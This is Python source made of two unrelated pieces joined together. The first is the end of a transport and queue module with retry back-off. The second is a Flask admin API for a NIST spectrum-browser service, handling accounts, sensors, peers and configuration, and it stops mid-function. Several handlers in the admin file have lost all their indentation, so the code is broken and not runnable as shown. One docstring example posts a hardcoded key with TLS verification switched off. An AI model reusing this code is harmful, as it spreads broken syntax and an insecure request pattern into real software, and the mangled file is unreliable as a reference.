        Note: this method will only return once the queue is empty. This means it can block indefinitely if more events
        are produced in other threads than can be consumed.
        """
        self.queue(None, None, flush=True)
        if not self._flushed.wait(timeout=self._max_flush_time):
            raise ValueError("flush timed out")

    def handle_transport_success(self, **kwargs):
        """
        Success handler called by the transport on successful send
        """
        self.state.set_success()

    def handle_transport_fail(self, exception=None, **kwargs):
        """
        Failure handler called by the transport on send failure
        """
        message = str(exception)
        logger.error("Failed to submit message: %r", message, exc_info=getattr(exception, "print_trace", True))
        self.state.set_fail()

    def handle_fork(self) -> None:
        """Helper method to run code after a fork has been detected"""
        pass
# left for backwards compatibility: older code/configs may reference AsyncTransport
AsyncTransport = Transport
class TransportState(object):
    """Tracks transport health and implements a quadratic retry back-off."""

    ONLINE = 1
    ERROR = 0

    def __init__(self):
        self.status = self.ONLINE
        self.last_check = None
        self.retry_number = -1

    def should_try(self):
        """Return True if a send attempt is currently allowed."""
        if self.status != self.ONLINE:
            # quadratic back-off, capped at 36 seconds (min(n, 6) ** 2)
            wait_interval = min(self.retry_number, 6) ** 2
            return timeit.default_timer() - self.last_check > wait_interval
        return True

    def set_fail(self):
        """Record a failed send: enter ERROR state and grow the back-off."""
        self.status = self.ERROR
        self.retry_number += 1
        self.last_check = timeit.default_timer()

    def set_success(self):
        """Record a successful send: reset state to healthy."""
        self.status = self.ONLINE
        self.last_check = None
        self.retry_number = -1

    def did_fail(self):
        """Return True while the transport is in the ERROR state."""
        return self.status == self.ERROR
class ChilledQueue(_queue.Queue, object):
    """
    A queue subclass that is a bit more chill about how often it notifies the not empty event

    Note: we inherit from object because queue.Queue is an old-style class in Python 2. This can
    be removed once we stop support for Python 2
    """

    def __init__(self, maxsize=0, chill_until=100, max_chill_time=1.0):
        # consumers are only notified once the queue holds more than
        # `chill_until` items, or once `max_chill_time` seconds passed
        # since the last notification (or when put() is called with chill=False)
        self._chill_until = chill_until
        self._max_chill_time = max_chill_time
        self._last_unchill = time.time()
        super(ChilledQueue, self).__init__(maxsize=maxsize)

    def put(self, item, block=True, timeout=None, chill=True):
        """Put an item into the queue.

        If optional args 'block' is true and 'timeout' is None (the default),
        block if necessary until a free slot is available. If 'timeout' is
        a non-negative number, it blocks at most 'timeout' seconds and raises
        the Full exception if no free slot was available within that time.
        Otherwise ('block' is false), put an item on the queue if a free slot
        is immediately available, else raise the Full exception ('timeout'
        is ignored in that case).

        If 'chill' is true (the default), the not_empty notification may be
        deferred according to this queue's chill settings.
        """
        # NOTE: this is a copy of queue.Queue.put with only the notify
        # condition changed; the locking/wait logic must stay identical.
        with self.not_full:
            if self.maxsize > 0:
                if not block:
                    if self._qsize() >= self.maxsize:
                        raise _queue.Full
                elif timeout is None:
                    while self._qsize() >= self.maxsize:
                        self.not_full.wait()
                elif timeout < 0:
                    raise ValueError("'timeout' must be a non-negative number")
                else:
                    endtime = time.time() + timeout
                    while self._qsize() >= self.maxsize:
                        remaining = endtime - time.time()
                        if remaining <= 0.0:
                            raise _queue.Full
                        self.not_full.wait(remaining)
            self._put(item)
            self.unfinished_tasks += 1
            # wake the consumer only if asked to, if the queue is filling up,
            # or if we haven't woken it for too long
            if (
                not chill
                or self._qsize() > self._chill_until
                or (time.time() - self._last_unchill) > self._max_chill_time
            ):
                self.not_empty.notify()
                self._last_unchill = time.time()
|
Admin.py | #! /usr/local/bin/python2.7
# -*- coding: utf-8 -*-
#
# This software was developed by employees of the National Institute of
# Standards and Technology (NIST), and others.
# This software has been contributed to the public domain.
# Pursuant to title 15 United States Code Section 105, works of NIST
# employees are not subject to copyright protection in the United States
# and are considered to be in the public domain.
# As a result, a formal license is not needed to use this software.
#
# This software is provided "AS IS."
# NIST MAKES NO WARRANTY OF ANY KIND, EXPRESS, IMPLIED
# OR STATUTORY, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTY OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, NON-INFRINGEMENT
# AND DATA ACCURACY. NIST does not warrant or make any representations
# regarding the use of the software or the results thereof, including but
# not limited to the correctness, accuracy, reliability or usefulness of
# this software.
'''
Created on Jun 3, 2015
All the admin methods go in here.
@author: local
'''
import Bootstrap
sbHome = Bootstrap.getSpectrumBrowserHome()
import sys
sys.path.append(sbHome + "/services/common")
sys.path.append(sbHome + "/services/admin")
from flask import Flask, request, abort, make_response
from flask import jsonify
from TestCaseDecorator import testcase
import random
import json
import authentication
import urlparse
from geventwebsocket.handler import WebSocketHandler
from gevent import pywsgi
from flask_sockets import Sockets
import traceback
import util
import GarbageCollect
from GarbageCollect import RepeatingTimer
import SensorDb
from Sensor import Sensor
import Config
import Log
import AccountsManagement
import AccountsChangePassword
import GenerateZipFileForDownload
from Defines import STATUS
from Defines import ADMIN
from Defines import OK
import SessionLock
import argparse
import ResourceDataStreaming
import DataStreamSharedState
import CaptureDb
import RecomputeOccupancies
import logging
import pwd
import os
import DbCollections
from multiprocessing import Process
# Directory holding unit-test artifacts.
UNIT_TEST_DIR = "./unit-tests"
# NOTE(review): ``global`` at module scope is a no-op; ``launchedFromMain``
# is simply assigned below.
global launchedFromMain
if not Config.isConfigured():
    print "Please configure system using admin interface"
# sessions = {}
# Module-level session/symbol caches shared by the request handlers.
secureSessions = {}
gwtSymbolMap = {}
launchedFromMain = False
# Flask application serving the admin UI and its REST/websocket endpoints.
app = Flask(__name__, static_url_path="")
app.static_folder = sbHome + "/flask/static"
app.template_folder = sbHome + "/flask/templates"
sockets = Sockets(app)
random.seed()
@sockets.route("/admin/sysmonitor", methods=["GET"])
def getResourceData(ws):
    """
    Web-browser websocket connection handler.
    """
    util.debugPrint("getResourceData")
    try:
        # Delegate the long-lived system-monitor stream to the helper module.
        ResourceDataStreaming.getResourceData(ws)
    except:
        util.logStackTrace(sys.exc_info())
        traceback.print_exc()
        raise
@app.route("/admin", methods=["GET"])
def adminEntryPoint():
    """Serve the static admin UI landing page."""
    util.debugPrint("admin")
    return app.send_static_file("admin.html")
@app.route("/admin/getUserAccounts/<sessionId>", methods=["POST"])
def getUserAccounts(sessionId):
    """
    get user accounts.
    URL Path:
        sessionId: session ID of the admin login session.
    """
    @testcase
    def getUserAccountsWorker(sessionId):
        try:
            if not authentication.checkSessionId(sessionId, ADMIN):
                abort(403)
            util.debugPrint("getUserAccounts")
            userAccounts = AccountsManagement.getUserAccounts()
            # Response shape: {"userAccounts": [...], STATUS: "OK", "statusMessage": ""}
            retval = {"userAccounts": userAccounts,
                      STATUS: "OK",
                      "statusMessage": ""}
            return jsonify(retval)
        except:
            print "Unexpected error:", sys.exc_info()[0]
            print sys.exc_info()
            traceback.print_exc()
            util.logStackTrace(sys.exc_info())
            raise
    return getUserAccountsWorker(sessionId)
@app.route("/admin/deleteAccount/<emailAddress>/<sessionId>", methods=["POST"])
def deleteAccount(emailAddress, sessionId):
"""
delete user account
URL Path:
- emailAddress: The email address of the account to delete.
- sessionId: session ID of the admin login session.
URL Args (required):
none
HTTP Return Codes:
- 200 OK: if the request successfully completed.
- 403 Forbidden: Invalid session ID.
- 400 Bad Request: URL args not present or invalid.
"""
def deleteAccountWorker(emailAddress, sessionId):
try:
if not authentication.checkSessionId(sessionId, ADMIN):
abort(403)
util.debugPrint("deleteAccount")
return jsonify(AccountsManagement.deleteAccount(emailAddress))
except:
print "Unexpected error:", sys.exc_info()[0]
print sys.exc_info()
traceback.print_exc()
util.logStackTrace(sys.exc_info())
raise
return deleteAccountWorker(emailAddress, sessionId)
@app.route("/admin/unlockAccount/<emailAddress>/<sessionId>", methods=["POST"])
def unlockAccount(emailAddress, sessionId):
    """
    unlock user account
    URL Path:
    - emailAddress: The email address of the account to unlock.
    - sessionId: session ID of the admin login session.
    URL Args (required):
    none
    HTTP Return Codes:
    - 200 OK: if the request successfully completed.
    - 403 Forbidden: Invalid session ID.
    - 400 Bad Request: URL args not present or invalid.
    """
    @testcase
    def unlockAccountWorker(emailAddress, sessionId):
        try:
            if not authentication.checkSessionId(sessionId, ADMIN):
                abort(403)
            util.debugPrint("unlockAccount")
            return jsonify(AccountsManagement.unlockAccount(emailAddress))
        except:
            print "Unexpected error:", sys.exc_info()[0]
            print sys.exc_info()
            traceback.print_exc()
            util.logStackTrace(sys.exc_info())
            raise
    return unlockAccountWorker(emailAddress, sessionId)
@app.route("/admin/togglePrivilegeAccount/<emailAddress>/<sessionId>",
           methods=["POST"])
def togglePrivilegeAccount(emailAddress, sessionId):
    """
    toggle the privilege of a user account
    URL Path:
    - emailAddress: The email address of the account to change.
    - sessionId: session ID of the admin login session.
    URL Args (required):
    none
    HTTP Return Codes:
    - 200 OK: if the request successfully completed.
    - 403 Forbidden: Invalid session ID.
    - 400 Bad Request: URL args not present or invalid.
    """
    @testcase
    def togglePrivilegeAccountWorker(emailAddress, sessionId):
        try:
            if not authentication.checkSessionId(sessionId, ADMIN):
                abort(403)
            util.debugPrint("togglePrivilegeAccount")
            return jsonify(AccountsManagement.togglePrivilegeAccount(
                emailAddress))
        except:
            print "Unexpected error:", sys.exc_info()[0]
            print sys.exc_info()
            traceback.print_exc()
            util.logStackTrace(sys.exc_info())
            raise
    return togglePrivilegeAccountWorker(emailAddress, sessionId)
@app.route("/admin/resetAccountExpiration/<emailAddress>/<sessionId>",
           methods=["POST"])
def resetAccountExpiration(emailAddress, sessionId):
    """
    reset the expiration of a user account
    URL Path:
    - emailAddress: The email address of the account to reset.
    - sessionId: session ID of the admin login session.
    URL Args:
    none
    HTTP Return Codes:
    - 200 OK: if the request successfully completed.
    - 403 Forbidden: Invalid session ID.
    - 400 Bad Request: URL args not present or invalid.
    """
    @testcase
    def resetAccountExpirationWorker(emailAddress, sessionId):
        try:
            if not authentication.checkSessionId(sessionId, ADMIN):
                abort(403)
            util.debugPrint("resetAccountExpiration")
            return jsonify(AccountsManagement.resetAccountExpiration(
                emailAddress))
        except:
            print "Unexpected error:", sys.exc_info()[0]
            print sys.exc_info()
            traceback.print_exc()
            util.logStackTrace(sys.exc_info())
            raise
    return resetAccountExpirationWorker(emailAddress, sessionId)
@app.route("/admin/createAccount/<sessionId>", methods=["POST"])
def createAccount(sessionId):
"""
create user account
URL Path:
sessionId: login session ID
Body (required):
- JSON string of account info
HTTP Return Codes:
- 200 OK: if the request successfully completed.
- 403 Forbidden: Invalid session ID.
- 400 Bad Request: URL args not present or invalid.
"""
@testcase
def createAccountWorker(sessionId):
try:
if not authentication.checkSessionId(sessionId, ADMIN):
abort(403)
util.debugPrint("createAccount")
requestStr = request.data
accountData = json.loads(requestStr)
return jsonify(AccountsManagement.createAccount(accountData))
except:
print "Unexpected error:", sys.exc_info()[0]
print sys.exc_info()
traceback.print_exc()
util.logStackTrace(sys.exc_info())
raise
return createAccountWorker(sessionId)
@app.route("/admin/resetPassword", methods=['POST'])
def resetPassword():
@testcase
def resetPasswordWorker():
try:
requestStr = request.data
accountData = json.loads(requestStr)
return authentication.resetPassword(accountData)
except:
print "Unexpected error:", sys.exc_info()[0]
print sys.exc_info()
traceback.print_exc()
util.logStackTrace(sys.exc_info())
raise
return resetPasswordWorker()
@app.route("/admin/authenticate", methods=['POST'])
def authenticate():
"""
Authenticate the user given his username and password from the requested
browser page or return an error if the user cannot be authenticated.
URL Path:
URL Args:
None
Body:
- JSON data
"""
@testcase
def authenticateWorker():
try:
util.debugPrint("authenticate")
p = urlparse.urlparse(request.url)
urlpath = p.path
if not Config.isConfigured() and urlpath[0] == "spectrumbrowser":
msg = "attempt to access spectrumbrowser before configuration"
msg += " -- please configure"
util.debugPrint(msg)
abort(500)
requestStr = request.data
accountData = json.loads(requestStr)
return jsonify(authentication.authenticateUser(accountData))
except:
print "Unexpected error:", sys.exc_info()[0]
print sys.exc_info()
traceback.print_exc()
util.logStackTrace(sys.exc_info())
raise
return authenticateWorker()
@app.route("/admin/verifySessionToken/<sessionId>", methods=['POST'])
def verifySessionToken(sessionId):
"""
Check the session token. Return TRUE if session Token is good and false
otherwise.
URL Path:
- sessionId: the session ID to check.
HTTP Return code:
- 200 OK
returns a document {status:OK} or {status: NOK} depending upon
whether the session token verified or not.
"""
try:
if authentication.checkSessionId(sessionId, ADMIN):
return jsonify({"status": "OK"})
else:
return jsonify({"status": "NOK"})
except:
print "Unexpected error:", sys.exc_info()[0]
print sys.exc_info()
traceback.print_exc()
util.logStackTrace(sys.exc_info())
raise
@app.route("/admin/logOut/<sessionId>", methods=['POST'])
# @testcase
def logOut(sessionId):
    """
    Log out of an existing session.
    URL Path:
        sessionId: The session ID to log out.
    """
    @testcase
    def logOutWorker(sessionId):
        try:
            # No authentication check: logging out an unknown session is harmless.
            authentication.logOut(sessionId)
            return jsonify({"status": "OK"})
        except:
            print "Unexpected error:", sys.exc_info()[0]
            print sys.exc_info()
            traceback.print_exc()
            util.logStackTrace(sys.exc_info())
            raise
    return logOutWorker(sessionId)
@app.route("/admin/getSystemConfig/<sessionId>", methods=["POST"])
def getSystemConfig(sessionId):
"""
get system configuration.
URL Path:
sessionId: Session ID of the login session.
"""
@testcase
def getSystemConfigWorker(sessionId):
try:
if not authentication.checkSessionId(sessionId, ADMIN):
abort(403)
systemConfig = Config.getSystemConfig()
if systemConfig is None:
config = Config.getDefaultConfig()
return jsonify(config)
else:
return jsonify(systemConfig)
except:
print "Unexpected error:", sys.exc_info()[0]
print sys.exc_info()
traceback.print_exc()
util.logStackTrace(sys.exc_info())
raise
return getSystemConfigWorker(sessionId)
@app.route("/admin/getESAgents/<sessionId>", methods=["POST"])
def getESAgents(sessionId):
    """
    get Sensor Control agents (typically the ESC) .
    URL Path:
        sessionId: session ID of the login session.
    """
    @testcase
    def getESAgentsWorker(sessionId):
        try:
            if not authentication.checkSessionId(sessionId, ADMIN):
                abort(403)
            agents = Config.getESAgents()
            # Response shape: {"esAgents": [...], STATUS: "OK"}
            retval = {"esAgents": agents}
            retval[STATUS] = 'OK'
            return jsonify(retval)
        except:
            print "Unexpected error:", sys.exc_info()[0]
            print sys.exc_info()
            traceback.print_exc()
            util.logStackTrace(sys.exc_info())
            raise
    return getESAgentsWorker(sessionId)
@app.route("/admin/armSensor/<sensorId>/<sessionId>", methods=["POST"])
def testArmSensor(sensorId, sessionId):
    """
    URL Path:
        sessionId -- the session ID of the login session.
        sensorId -- the sensorId
    URL Args: None
    Request Body:
        - agentName: Name of the agent to arm/disarm sensor.
        - key : Key (password) of the agent to arm/disarm the sensor.
    HTTP Return Codes:
        - 200 OK: invocation was successful.
        - 403 Forbidden: authentication failure
        - 400 Bad request: Sensor is not a streaming sensor.
    Example Invocation:
    ::
        params = {}
        params["agentName"] = "NIST_ESC"
        params["key"] = "ESC_PASS"
        url = "https://{host}:8443/admin/armSensor/{self.sensorId}"
        r = requests.post(url, data=json.dumps(params), verify=False)
    """
    try:
        if not authentication.checkSessionId(sessionId, ADMIN):
            abort(403)
        # 404 for unknown sensors, 400 for sensors without streaming support.
        sensorConfig = SensorDb.getSensorObj(sensorId)
        if sensorConfig is None:
            abort(404)
        if not sensorConfig.isStreamingEnabled():
            abort(400)
        # Optional query arg; defaults to a non-persistent arm command.
        persistent = request.args.get("persistent")
        if persistent is None:
            persistent = "false"
        DataStreamSharedState.sendCommandToSensor(sensorId, json.dumps(
            {"sensorId": sensorId,
             "command": "arm",
             "persistent": persistent}))
        return jsonify({STATUS: OK})
    except:
        print "Unexpected error:", sys.exc_info()[0]
        print sys.exc_info()
        traceback.print_exc()
        util.logStackTrace(sys.exc_info())
        raise
@app.route("/admin/addESAgent/<sessionId>", methods=["POST"])
def addESAgent(sessionId):
    """
    Add a Sensor Control (ES) agent defined by the posted JSON body
    ({"agentName": ..., "key": ...}) and return the updated agent list.
    """
    # Reserved characters rejected from the agent name and key
    # (presumably because these values are embedded in URLs -- confirm).
    invalid_chars = {'&', '$', '+', '/', ':', ';', '=', '?', '@', '#'}
    @testcase
    def addESAgentWorker(sessionId):
        try:
            if not authentication.checkSessionId(sessionId, ADMIN):
                abort(403)
            requestStr = request.data
            agentConfig = json.loads(requestStr)
            agentName = agentConfig["agentName"]
            bad_chars = invalid_chars.intersection(agentName)
            if bad_chars:
                msg = "Invalid character in agentName: {}"
                util.debugPrint(msg.format(bad_chars))
                abort(400)
            key = agentConfig["key"]
            bad_chars = invalid_chars.intersection(key)
            if bad_chars:
                msg = "Invalid character in key: {}"
                util.debugPrint(msg.format(bad_chars))
                abort(400)
            Config.addESAgent(agentName, key)
            agents = Config.getESAgents()
            retval = {"esAgents": agents}
            retval[STATUS] = 'OK'
            return jsonify(retval)
        except:
            print "Unexpected error:", sys.exc_info()[0]
            print sys.exc_info()
            traceback.print_exc()
            util.logStackTrace(sys.exc_info())
            raise
    return addESAgentWorker(sessionId)
@app.route("/admin/deleteESAgent/<agentName>/<sessionId>", methods=["POST"])
def deleteESAgent(agentName, sessionId):
    """
    remove ES Agent.
    URL Path:
        agentName: Agent name to remove.
        sessionId: session ID of the login session.
    """
    @testcase
    def deleteESAgentWorker(agentName, sessionId):
        try:
            if not authentication.checkSessionId(sessionId, ADMIN):
                abort(403)
            Config.removeESAgent(agentName)
            # Return the refreshed agent list after removal.
            agents = Config.getESAgents()
            retval = {"esAgents": agents}
            retval[STATUS] = 'OK'
            return jsonify(retval)
        except:
            print "Unexpected error:", sys.exc_info()[0]
            print sys.exc_info()
            traceback.print_exc()
            util.logStackTrace(sys.exc_info())
            raise
    return deleteESAgentWorker(agentName, sessionId)
@app.route("/admin/getPeers/<sessionId>", methods=["POST"])
def getPeers(sessionId):
    """
    get outbound peers.
    URL Path:
        sessionId: session ID of the login session.
    """
    @testcase
    def getPeersWorker(sessionId):
        try:
            if not authentication.checkSessionId(sessionId, ADMIN):
                abort(403)
            peers = Config.getPeers()
            # Response shape: {"peers": [...], STATUS: "OK"}
            retval = {"peers": peers}
            retval[STATUS] = 'OK'
            return jsonify(retval)
        except:
            print "Unexpected error:", sys.exc_info()[0]
            print sys.exc_info()
            traceback.print_exc()
            util.logStackTrace(sys.exc_info())
            raise
    return getPeersWorker(sessionId)
@app.route("/admin/removePeer/<host>/<port>/<sessionId>", methods=["POST"])
def removePeer(host, port, sessionId):
"""
remove outbound peer.
URL Path:
host: Host of peer to remove
port: port or peer to remove
sessionId: login session ID
"""
@testcase
def removePeerWorker(host, port, sessionId):
try:
if not authentication.checkSessionId(sessionId, ADMIN):
abort(403)
Config.removePeer(host, int(port))
peers = Config.getPeers()
retval = {"peers": peers}
return jsonify(retval)
except:
print "Unexpected error:", sys.exc_info()[0]
print sys.exc_info()
traceback.print_exc()
util.logStackTrace(sys.exc_info())
raise
return removePeerWorker(host, port, sessionId)
@app.route("/admin/addPeer/<host>/<port>/<protocol>/<sessionId>",
           methods=["POST"])
def addPeer(host, port, protocol, sessionId):
    """
    add an outbound peer
    URL Path:
        host: Host of peer to add.
        port: port of peer
        protocol: http or https
        sessionId: login session id.
    """
    @testcase
    def addPeerWorker(host, port, protocol, sessionId):
        try:
            if not authentication.checkSessionId(sessionId, ADMIN):
                abort(403)
            # TODO -- parameter checking.
            Config.addPeer(protocol, host, int(port))
            # Return the refreshed peer list after the addition.
            peers = Config.getPeers()
            retval = {"peers": peers}
            retval[STATUS] = OK
            return jsonify(retval)
        except:
            print "Unexpected error:", sys.exc_info()[0]
            print sys.exc_info()
            traceback.print_exc()
            util.logStackTrace(sys.exc_info())
            raise
    return addPeerWorker(host, port, protocol, sessionId)
@app.route("/admin/getInboundPeers/<sessionId>", methods=["POST"])
def getInboundPeers(sessionId):
    """
    get a list of inbound peers.
    URL path:
    - sessionID = session ID of the login
    URL Args:
        None
    Returns:
        - JSON string containing the inbound Peers accepted by this server.
    HTTP Return Codes:
        - 403 if authentication failed.
        - 200 successful return.
    """
    @testcase
    def getInboundPeersWorker(sessionId):
        try:
            if not authentication.checkSessionId(sessionId, ADMIN):
                abort(403)
            peerKeys = Config.getInboundPeers()
            # Response shape: {"inboundPeers": [...], STATUS: OK}
            retval = {"inboundPeers": peerKeys}
            retval[STATUS] = OK
            return jsonify(retval)
        except:
            print "Unexpected error:", sys.exc_info()[0]
            print sys.exc_info()
            traceback.print_exc()
            util.logStackTrace(sys.exc_info())
            raise
    return getInboundPeersWorker(sessionId)
@app.route("/admin/deleteInboundPeer/<peerId>/<sessionId>", methods=["POST"])
def deleteInboundPeer(peerId, sessionId):
    """
    Delete an inbound peer record.
    URL Path:
    - peerId: Peer ID of peer to delete.
    - sessionId: session ID of authenticated session.
    Returns:
        - JSON formatted list of peers.
    HTTP Return Codes:
    - 403 if authentication not successful.
    """
    @testcase
    def deleteInboundPeerWorker(peerId, sessionId):
        try:
            if not authentication.checkSessionId(sessionId, ADMIN):
                abort(403)
            Config.deleteInboundPeer(peerId)
            # Return the refreshed inbound-peer list after deletion.
            peerKeys = Config.getInboundPeers()
            retval = {"inboundPeers": peerKeys}
            retval[STATUS] = OK
            return jsonify(retval)
        except:
            print "Unexpected error:", sys.exc_info()[0]
            print sys.exc_info()
            traceback.print_exc()
            util.logStackTrace(sys.exc_info())
            raise
    return deleteInboundPeerWorker(peerId, sessionId)
@app.route("/admin/addInboundPeer/<sessionId>", methods=["POST"])
def addInboundPeer(sessionId):
    """
    Add an inbound peer defined by the posted JSON body and return the
    updated inbound-peer list.
    """
    @testcase
    def addInboundPeerWorker(sessionId):
        try:
            if not authentication.checkSessionId(sessionId, ADMIN):
                abort(403)
            requestStr = request.data
            peerConfig = json.loads(requestStr)
            util.debugPrint("peerConfig " + json.dumps(peerConfig, indent=4))
            Config.addInboundPeer(peerConfig)
            peers = Config.getInboundPeers()
            retval = {"inboundPeers": peers}
            retval[STATUS] = "OK"
            return jsonify(retval)
        except:
            print "Unexpected error:", sys.exc_info()[0]
            print sys.exc_info()
            traceback.print_exc()
            util.logStackTrace(sys.exc_info())
            raise
    return addInboundPeerWorker(sessionId)
@app.route("/admin/setSystemConfig/<sessionId>", methods=["POST"])
def setSystemConfig(sessionId):
    """
    set system configuration
    URL Path:
        sessionId the session Id of the login in session.
    URL Args: None
    Request Body:
        A JSON formatted string containing the system configuration.
    """
    @testcase
    def setSystemConfigWorker(sessionId):
        try:
            util.debugPrint("setSystemConfig: " + sessionId)
            if not authentication.checkSessionId(sessionId, ADMIN):
                abort(403)
            util.debugPrint("passed authentication")
            requestStr = request.data
            systemConfig = json.loads(requestStr)
            # Validate before persisting; a failed validation returns NOK
            # with the validator's message instead of an HTTP error.
            (statusCode, message) = Config.verifySystemConfig(systemConfig)
            if not statusCode:
                util.debugPrint("did not verify sys config")
                return jsonify({"status": "NOK", "ErrorMessage": message})
            util.debugPrint("setSystemConfig " + json.dumps(systemConfig,
                                                            indent=4, ))
            if Config.setSystemConfig(systemConfig):
                return jsonify({"status": "OK"})
            else:
                return jsonify({"status": "NOK", "ErrorMessage": "Unknown"})
        except:
            print "Unexpected error:", sys.exc_info()[0]
            print sys.exc_info()
            traceback.print_exc()
            util.logStackTrace(sys.exc_info())
            raise
    return setSystemConfigWorker(sessionId)
@app.route("/admin/addSensor/<sessionId>", methods=["POST"])
def addSensor(sessionId):
"""
Add a sensor to the system or return error if the sensor does not exist.
URL Path:
sessionId the session Id of the login in session.
URL Args: None
Request Body:
A JSON formatted string containing the sensor configuration.
"""
@testcase
def addSensorWorker(sessionId):
try:
if not Config.isConfigured():
util.debugPrint("Please configure system")
return make_response("Please configure system", 500)
if not authentication.checkSessionId(sessionId, ADMIN):
return make_response("Session not found.", 403)
requestStr = request.data
sensorConfig = json.loads(requestStr)
return jsonify(SensorDb.addSensor(sensorConfig))
except:
print "Unexpected error:", sys.exc_info()[0]
print sys.exc_info()
traceback.print_exc()
util.logStackTrace(sys.exc_info())
raise
return addSensorWorker(sessionId)
@app.route("/admin/toggleSensorStatus/<sensorId>/<sessionId>",
           methods=["POST"])
def toggleSensorStatus(sensorId, sessionId):
    """Toggle the status of the given sensor (admin session required)."""
    @testcase
    def toggleSensorStatusWorker(sensorId, sessionId):
        try:
            if not Config.isConfigured():
                util.debugPrint("Please configure system")
                return make_response("Please configure system", 500)
            if not authentication.checkSessionId(sessionId, ADMIN):
                return make_response("Session not found.", 403)
            return jsonify(SensorDb.toggleSensorStatus(sensorId))
        except:
            print "Unexpected error:", sys.exc_info()[0]
            print sys.exc_info()
            traceback.print_exc()
            util.logStackTrace(sys.exc_info())
            raise
    return toggleSensorStatusWorker(sensorId, sessionId)
@app.route("/admin/purgeSensor/<sensorId>/<sessionId>", methods=["POST"])
def purgeSensor(sensorId, sessionId):
    """Mark the given sensor's data for purging (admin session required)."""
    @testcase
    def purgeSensorWorker(sensorId, sessionId):
        try:
            if not Config.isConfigured():
                util.debugPrint("Please configure system")
                return make_response("Please configure system", 500)
            if not authentication.checkSessionId(sessionId, ADMIN):
                return make_response("Session not found.", 403)
            return jsonify(SensorDb.markSensorForPurge(sensorId))
        except:
            print "Unexpected error:", sys.exc_info()[0]
            print sys.exc_info()
            traceback.print_exc()
            util.logStackTrace(sys.exc_info())
            raise
    return purgeSensorWorker(sensorId, sessionId)
@app.route("/admin/deleteSensor/<sensorId>/<sessionId>", methods=["POST"])
def deleteSensor(sensorId, sessionId):
    """Delete the given sensor from the sensor database (admin session required)."""
    @testcase
    def deleteSensorWorker(sensorId, sessionId):
        try:
            if not Config.isConfigured():
                util.debugPrint("Please configure system")
                return make_response("Please configure system", 500)
            if not authentication.checkSessionId(sessionId, ADMIN):
                return make_response("Session not found.", 403)
            return jsonify(SensorDb.deleteSensor(sensorId))
        except:
            print "Unexpected error:", sys.exc_info()[0]
            print sys.exc_info()
            traceback.print_exc()
            util.logStackTrace(sys.exc_info())
            raise
    return deleteSensorWorker(sensorId, sessionId)
@app.route("/admin/updateSensor/<sessionId>", methods=["POST"])
def updateSensor(sessionId):
    """Update a sensor from the posted JSON configuration (admin session required)."""
    @testcase
    def updateSensorWorker(sessionId):
        try:
            util.debugPrint("updateSensor")
            if not Config.isConfigured():
                util.debugPrint("Please configure system")
                return make_response("Please configure system", 500)
            if not authentication.checkSessionId(sessionId, ADMIN):
                return make_response("Session not found.", 403)
            requestStr = request.data
            sensorConfig = json.loads(requestStr)
            return jsonify(SensorDb.updateSensor(sensorConfig))
        except:
            print "Unexpected error:", sys.exc_info()[0]
            print sys.exc_info()
            traceback.print_exc()
            util.logStackTrace(sys.exc_info())
            raise
    return updateSensorWorker(sessionId)
@app.route("/admin/getFrequencyBands/<sessionId>", methods=["POST"])
def getFrequencyBands(sessionId):
    """Return the frequency bands known to the sensor database."""
    @testcase
    def getFreqBandsWorker(sessionId):
        try:
            if not Config.isConfigured():
                util.debugPrint("Please configure system")
                return make_response("Please configure system", 500)
            if not authentication.checkSessionId(sessionId, ADMIN):
                return make_response("Session not found.", 403)
            return jsonify(SensorDb.getFreqBands())
        except:
            print "Unexpected error:", sys.exc_info()[0]
            print sys.exc_info()
            traceback.print_exc()
            util.logStackTrace(sys.exc_info())
            raise
    return getFreqBandsWorker(sessionId)
@app.route("/admin/getSystemMessages/<sensorId>/<sessionId>", methods=["POST"])
def getSystemMessages(sensorId, sessionId):
    """Generate a downloadable zip of the system messages for a sensor."""
    @testcase
    def getSystemMessagesWorker(sensorId, sessionId):
        try:
            if not Config.isConfigured():
                util.debugPrint("Please configure system")
                return make_response("Please configure system", 500)
            if not authentication.checkSessionId(sessionId, ADMIN):
                return make_response("Session not found.", 403)
            # Local alias keeps the wrapped call below within line limits.
            genzip = GenerateZipFileForDownload
            zipfile = genzip.generateSysMessagesZipFileForDownload(sensorId,
                                                                   sessionId)
            return jsonify(zipfile)
        except:
            print "Unexpected error:", sys.exc_info()[0]
            print sys.exc_info()
            traceback.print_exc()
            util.logStackTrace(sys.exc_info())
            raise
    return getSystemMessagesWorker(sensorId, sessionId)
@app.route("/admin/getSensorInfo/<sessionId>", methods=["POST"])
def getSensorInfo(sessionId):
    '''
    Get the sensor configuration information of all sensors from the
    sensor database. Note that sensitive information such as sensor
    key is not returned.
    URL Path:
        sessionId the session Id of the login in session.
    URL Args:
        - getFirstLastMessages: return the first and last message metadata
    Request Body:
        A JSON formatted string containing the sensor information.
    HTTP Return codes:
        200 OK if the invocation successful.
    '''
    @testcase
    def getSensorInfoWorker(sessionId):
        try:
            if not authentication.checkSessionId(sessionId, ADMIN):
                return make_response("Session not found", 403)
            # Optional query arg; only the literal string "true" enables
            # first/last message metadata in the response.
            lastMessageFlagStr = request.args.get("getFirstLastMessages")
            if lastMessageFlagStr is not None and lastMessageFlagStr == "true":
                lastMessageFlag = True
            else:
                lastMessageFlag = False
            response = SensorDb.getSensors(getMessageDates=lastMessageFlag)
            return jsonify(response)
        except:
            print "Unexpected error:", sys.exc_info()[0]
            print sys.exc_info()
            traceback.print_exc()
            util.logStackTrace(sys.exc_info())
            raise
    return getSensorInfoWorker(sessionId)
@app.route("/admin/recomputeOccupancies/<sensorId>/<sessionId>",
           methods=["POST"])
def recomputeOccupancies(sensorId, sessionId):
    """Recompute the occupancy statistics for the given sensor."""
    @testcase
    def recomputeOccupanciesWorker(sensorId, sessionId):
        try:
            if not authentication.checkSessionId(sessionId, ADMIN):
                return make_response("Session not found", 403)
            return jsonify(RecomputeOccupancies.recomputeOccupancies(sensorId))
        except:
            print "Unexpected error:", sys.exc_info()[0]
            print sys.exc_info()
            traceback.print_exc()
            util.logStackTrace(sys.exc_info())
            raise
    return recomputeOccupanciesWorker(sensorId, sessionId)
@app.route("/admin/resetNoiseFloor/<sensorId>/<noiseFloor>/<sessionId>",
           methods=["POST"])
def resetNoiseFloor(sensorId, noiseFloor, sessionId):
    """Reset the noise floor for a sensor and recompute dependent data."""
    # NOTE(review): unlike sibling routes, this handler is not wrapped in a
    # @testcase worker -- confirm whether that is intentional.
    try:
        if not authentication.checkSessionId(sessionId, ADMIN):
            return make_response("Session not found", 403)
